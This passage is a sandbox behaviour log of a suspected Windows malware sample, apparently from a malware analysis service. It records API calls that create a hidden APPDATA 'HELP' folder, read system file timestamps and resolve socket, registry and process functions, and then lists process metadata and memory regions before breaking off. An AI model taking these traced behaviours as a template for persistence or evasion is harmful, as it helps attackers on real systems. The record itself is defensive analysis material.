(dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.736] SetLastError (dwErrCode=0x0) [0035.736] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.737] GetLastError () returned 0x0 [0035.737] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.738] SetLastError (dwErrCode=0x0) [0035.738] GetLastError () returned 0x0 [0035.744] SetLastError (dwErrCode=0x0) [0035.744] GetLastError () returned 0x0 [0035.744] SetLastError (dwErrCode=0x0) [0035.744] GetLastError () returned 0x0 [0035.744] SetLastError (dwErrCode=0x0) [0035.744] GetLastError () returned 0x0 [0035.744] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.745] SetLastError (dwErrCode=0x0) [0035.745] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.746] SetLastError (dwErrCode=0x0) [0035.746] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.747] SetLastError (dwErrCode=0x0) [0035.747] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.748] GetLastError () returned 0x0 [0035.748] SetLastError (dwErrCode=0x0) [0035.749] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.749] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.749] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f680 | out: lpSystemTimeAsFileTime=0x22f680*(dwLowDateTime=0xe2fdf690, dwHighDateTime=0x1d3dfba)) [0035.750] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f5b8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.750] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f4a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetLastError () returned 0x0 [0035.750] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.750] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.750] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.751] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.751] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.751] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.751] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.751] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.751] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.751] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.751] GetLastError () returned 0xb7 [0035.751] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.751] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.751] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.751] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.751] wsprintfA (in: param_1=0x22f320, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.751] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.751] wsprintfA (in: param_1=0x22f21c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.751] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.751] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.751] CloseHandle (hObject=0x74) returned 1 [0035.751] GetLastError () returned 0x0 [0035.751] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.751] GetLastError () returned 0x0 [0035.751] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.752] GetSystemDirectoryA (in: lpBuffer=0x22f320, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.752] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.752] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.752] CloseHandle (hObject=0x74) returned 1 [0035.752] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.752] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.752] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.753] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.754] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.754] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.754] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.754] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.754] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.754] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.754] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.755] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.755] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.756] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.756] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.756] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.756] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.756] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.756] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.756] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.756] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.757] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.757] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.757] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.758] HeapDestroy (hHeap=0xf0000) returned 1 Process: id = "61" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6c0" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2669 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2670 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2671 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2672 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2673 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2674 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2675 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2676 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2677 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2678 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2679 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2680 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2681 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2682 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2683 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2684 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2685 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2686 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2687 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2688 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2689 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2690 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2691 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2692 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2693 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2694 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2695 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2696 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2697 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2698 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2699 start_va = 0xc0000 end_va = 